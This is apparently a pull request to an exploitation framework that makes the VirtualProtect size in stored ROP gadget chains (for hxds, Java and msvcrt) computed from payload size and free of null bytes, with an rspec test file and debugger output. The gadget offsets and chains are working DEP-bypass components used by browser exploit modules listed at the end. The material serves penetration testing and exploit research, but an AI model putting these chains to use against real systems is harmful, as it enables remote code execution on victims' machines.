### PR TITLE
Dynamic ROP payload size

### DIFF
--- a/data/ropdb/hxds.xml
+++ b/data/ropdb/hxds.xml
@@ -11,7 +11,7 @@
 		<gadget offset="0x0001803c">POP EBP # RETN</gadget>
 		<gadget offset="0x0001803c">skip 4 bytes</gadget>
 		<gadget offset="0x0001750f">POP EBX # RETN</gadget>
-		<gadget value="fffffdff">0x00000201</gadget>
+		<gadget value="safe_negate_size">Safe size to NEG</gadget>
 		<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
 		<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
 		<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
@@ -40,7 +40,7 @@
 		<gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
 		<gadget offset="0x0003e4fa">skip 4 bytes</gadget>
 		<gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
-		<gadget value="fffffdff">0x00000201</gadget>
+		<gadget value="safe_negate_size">Safe size to NEG</gadget>
 		<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
 		<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
 		<gadget value="junk">JUNK</gadget>

--- a/data/ropdb/java.xml
+++ b/data/ropdb/java.xml
@@ -9,7 +9,7 @@
 		<gadget offset="0x00024c66">POP EBP # RETN</gadget>
 		<gadget offset="0x00024c66">skip 4 bytes</gadget>
 		<gadget offset="0x00004edc">POP EAX # RETN</gadget>
-		<gadget value="FFFFFBFF">0x00000201</gadget>
+		<gadget value="safe_negate_size">0x00000201</gadget>
 		<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
 		<gadget offset="0x000136e3">POP EBX # RETN</gadget>
 		<gadget value="0xffffffff"></gadget>

--- a/data/ropdb/msvcrt.xml
+++ b/data/ropdb/msvcrt.xml
@@ -8,7 +8,7 @@
 
 	<gadgets base="0x77c10000">
 		<gadget offset="0x0002b860">POP EAX # RETN</gadget>
-		<gadget value="0xFFFFFBFF">0xFFFFFBFF -> ebx</gadget>
+		<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
 		<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
 		<gadget value="junk">JUNK</gadget>
 		<gadget offset="0x0001362c">POP EBX # RETN</gadget>

--- a/lib/rex/exploitation/ropdb.rb
+++ b/lib/rex/exploitation/ropdb.rb
@@ -29,7 +29,7 @@ class RopDb
   #
   # Returns an array of ROP gadgets. Each gadget can either be an offset, or a value (symbol or
   # some integer).  When the value is a symbol, it can be one of these: :nop, :junk, :size,
-  # and :size_negate.
+  # :unsafe_negate_size, and :safe_negate_size
   # Note if no RoP is found, it returns an empry array.
   # Arguments:
   # rop_name - name of the ROP chain.

--- a/spec/lib/rex/exploitation/ropdb_spec.rb
+++ b/spec/lib/rex/exploitation/ropdb_spec.rb
@@ -1,0 +1,91 @@
+require 'rex/exploitation/ropdb'
+
+describe Rex::Exploitation::RopDb do
+  context "Class methods" do
+
+    context ".initialize" do
+      it "should initialize with a path of the ROP database ready" do
+        ropdb = Rex::Exploitation::RopDb.new
+        ropdb.instance_variable_get(:@base_path).should =~ /data\/ropdb\/$/
+      end
+    end
+
+    context ".has_rop?" do
+      ropdb = Rex::Exploitation::RopDb.new
+
+      it "should find the msvcrt ROP database" do
+        ropdb.has_rop?("msvcrt").should eq(true)
+      end
+
+      it "should find the java ROP database" do
+        ropdb.has_rop?("java").should eq(true)
+      end
+
+      it "should find the hxds ROP database" do
+        ropdb.has_rop?("hxds").should eq(true)
+      end
+
+      it "should find the flash ROP database" do
+        ropdb.has_rop?("flash").should eq(true)
+      end
+
+      it "should return false when I supply an invalid database" do
+        ropdb.has_rop?("sinn3r").should eq(false)
+      end
+    end
+
+    context ".select_rop" do
+      ropdb = Rex::Exploitation::RopDb.new
+
+      it "should return msvcrt gadgets" do
+        gadgets = ropdb.select_rop('msvcrt')
+        gadgets.length.should > 0
+      end
+
+      it "should return msvcrt gadgets for windows server 2003" do
+        gadgets = ropdb.select_rop('msvcrt', {'target'=>'2003'})
+        gadgets.length.should > 0
+      end
+
+      it "should return msvcrt gadgets with a new base" do
+        gadgets1 = ropdb.select_rop('msvcrt')
+        gadgets2 = ropdb.select_rop('msvcrt', {'base'=>0x10000000})
+
+        gadgets2[0].should_not eq(gadgets1[0])
+      end
+    end
+
+    context ".generate_rop_payload" do
+      ropdb = Rex::Exploitation::RopDb.new
+
+      it "should generate my ROP payload" do
+        ropdb.generate_rop_payload('msvcrt', 'AAAA').should =~ /AAAA$/
+      end
+
+      it "should generate my ROP payload with my stack pivot" do
+        ropdb.generate_rop_payload('msvcrt', 'AAAA', {'pivot'=>'BBBB'}).should =~ /^BBBB/
+      end
+    end
+
+    context ".get_safe_size" do
+      ropdb = Rex::Exploitation::RopDb.new
+
+      it "should return 0xfffffed0 (value does not need to be modified to avoid null bytes)" do
+        ropdb.send(:get_safe_size, 304).should eq(0xfffffed0)
+      end
+
+      it "should return 0xfffffeff (value is modified to avoid null bytes)" do
+        ropdb.send(:get_safe_size, 256).should eq(0xfffffeff)
+      end
+    end
+
+    context ".get_unsafe_size" do
+      ropdb = Rex::Exploitation::RopDb.new
+
+      it "should return 0xfffffc00 (contains a null byte)" do
+        ropdb.send(:get_unsafe_size, 1024).should eq(0xfffffc00)
+      end
+    end
+
+  end
+end


### PR DESCRIPTION
While crafting a ROP chain, this allows the size argument to be dynamic depending on the payload size. It can also avoid null bytes, which is a common requirement for our browser exploits.

The following demonstrates that the payload is only 100 bytes, and the size argument for VirtualProtect is automatically adjusted:

```
20302044   FFFFFFFF  ÿÿÿÿ  |hProcess = FFFFFFFF
20302048   20302074  t 0   |Address = 20302074
2030204C   00000064  d...  |Size = 64 (100.)
20302050   00000040  @...  |NewProtect = PAGE_EXECUTE_READWRITE
20302054   51C5BFAE  ®¿ÅQ  \pOldProtect = hxds.51C5BFAE
```

The following demonstrates that the payload is 1024 bytes, but the RopDb mixin decides to avoid using 1024, because the value to NEG for 1024 is 0xfffffc00, which has a null byte. So instead, it uses 0xfffffbff for the NEG instruction, which returns 1025 (decimal) for the size argument:

```
203024A4   FFFFFFFF  ÿÿÿÿ  |hProcess = FFFFFFFF
203024A8   203024D4  Ô$0   |Address = 203024D4
203024AC   00000401  ..  |Size = 401 (1025.)
203024B0   00000040  @...  |NewProtect = PAGE_EXECUTE_READWRITE
203024B4   51C5C638  8ÆÅQ  \pOldProtect = hxds.51C5C638
```

I also wrote a rspec for the mixin:

```
$ rspec spec/lib/rex/exploitation/ropdb_spec.rb 

Rex::Exploitation::RopDb
  Class methods
    .initialize
      should initialize with a path of the ROP database ready
    .has_rop?
      should find the msvcrt ROP database
      should find the java ROP database
      should find the hxds ROP database
      should find the flash ROP database
      should return false when I supply an invalid database
    .select_rop
      should return msvcrt gadgets
      should return msvcrt gadgets for windows server 2003
      should return msvcrt gadgets with a new base
    .generate_rop_payload
      should generate my ROP payload
      should generate my ROP payload with my stack pivot
    .get_safe_size
      should return 0xfffffed0 (value does not need to be modified to avoid null bytes)
      should return 0xfffffeff (value is modified to avoid null bytes)
    .get_unsafe_size
      should return 0xfffffc00 (contains a null byte)

Finished in 0.0756 seconds
14 examples, 0 failures
```

And then I tested the following modules to make sure the patch isn't breaking anything (for hxds, Java & msvcrt xp ROP chains):
- msxml_get_definition_code_exec
- ie_execcommand_uaf
- ms13_059_cflatmarkuppointer
- ms12_037_same_id
- mozilla_firefox_onreadystatechange
- ie_cgenericelement_uaf
- ie_setmousecapture_uaf
